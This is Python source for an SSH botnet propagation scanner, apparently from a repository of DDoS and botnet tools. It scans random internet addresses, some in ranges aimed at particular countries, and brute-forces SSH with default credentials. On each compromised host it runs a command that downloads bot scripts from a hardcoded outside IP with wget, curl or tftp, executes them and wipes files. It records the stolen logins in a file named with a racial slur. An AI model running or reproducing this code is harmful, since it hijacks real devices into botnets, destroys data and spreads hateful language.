Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/AUTOSCANNER/Bot.py
5038 views
1
#!/usr/bin/env python
2
import threading, paramiko, random, socket, time, sys
3
4
paramiko.util.log_to_file("/dev/null")
5
6
blacklist = [
7
'127'
8
]
9
10
passwords = [
11
"admin:admin"
12
]
13
14
if sys.argv[4] == '1':
15
passwords = ["root:root"]
16
if sys.argv[4] == '2':
17
passwords = ["guest:guest"]
18
if sys.argv[4] == '3':
19
passwords = ["admin:1234"]
20
if sys.argv[4] == '4':
21
passwords = ["telnet:telnet"]
22
23
print "\x1b[0;31mScanner Started...\x1b[0m"
24
25
ipclassinfo = sys.argv[2]
26
if ipclassinfo == "A":
27
ip1 = sys.argv[3]
28
elif ipclassinfo == "B":
29
ip1 = sys.argv[3].split(".")[0]
30
ip2 = sys.argv[3].split(".")[1]
31
elif ipclassinfo == "C":
32
ips = sys.argv[3].split(".")
33
num=0
34
for ip in ips:
35
num=num+1
36
if num == 1:
37
ip1 = ip
38
elif num == 2:
39
ip2 = ip
40
elif num == 3:
41
ip3 = ip
42
class sshscanner(threading.Thread):
43
global passwords
44
global ipclassinfo
45
if ipclassinfo == "A":
46
global ip1
47
elif ipclassinfo == "B":
48
global ip1
49
global ip2
50
elif ipclassinfo == "C":
51
global ip1
52
global ip2
53
global ip3
54
def run(self):
55
while 1:
56
try:
57
while 1:
58
thisipisbad='no'
59
if ipclassinfo == "A":
60
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
61
elif ipclassinfo == "B":
62
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
63
elif ipclassinfo == "C":
64
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
65
elif ipclassinfo == "BRAZIL":
66
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
67
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
68
elif ipclassinfo == "ER":
69
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
70
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
71
elif ipclassinfo == "LUCKY":
72
lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","101.108","1.20","125.25","125.26","182.52","125.24"]
73
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
74
elif ipclassinfo == "LUCKY2":
75
lucky2 = [ "122.3","122.52","122.54","119.93","124.105","124.105" ]
76
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
77
elif ipclassinfo == "LUCKY3":
78
lucky2 = [ "103.20","103.30","103.47","103.57","113.173","58.69","112.201","119.94","210.213","112.203" ]
79
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
80
elif ipclassinfo == "RAND":
81
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
82
elif ipclassinfo == "INTERNET":
83
lol = ["1"]
84
self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
85
else:
86
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
87
for badip in blacklist:
88
if badip in self.host:
89
thisipisbad='yes'
90
if thisipisbad=='no':
91
break
92
username='root'
93
password=""
94
port = 22
95
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
96
s.settimeout(3)
97
s.connect((self.host, port))
98
s.close()
99
ssh = paramiko.SSHClient()
100
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
101
dobreak=False
102
for passwd in passwords:
103
if ":n/a" in passwd:
104
password=""
105
else:
106
password=passwd.split(":")[1]
107
if "n/a:" in passwd:
108
username=""
109
else:
110
username=passwd.split(":")[0]
111
try:
112
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
113
dobreak=True
114
break
115
except:
116
pass
117
if True == dobreak:
118
break
119
badserver=True
120
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
121
output = stdout.read()
122
if "inet addr" in output:
123
badserver=False
124
if badserver == False:
125
print 'Slaughts Gang '+self.host+'|'+username+'|'+password+'|'+str(port)
126
ssh.exec_command("cd /tmp; wget http://65.60.18.108/bins.sh || curl -O http://65.60.18.108/bins.sh; chmod 777 bins.sh; sh bins.sh; busybox tftp 65.60.18.108 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 65.60.18.108; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *; exit")
127
nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
128
time.sleep(15)
129
ssh.close()
130
except:
131
pass
132
133
for x in range(0,1500):
134
try:
135
t = sshscanner()
136
t.start()
137
except:
138
pass
139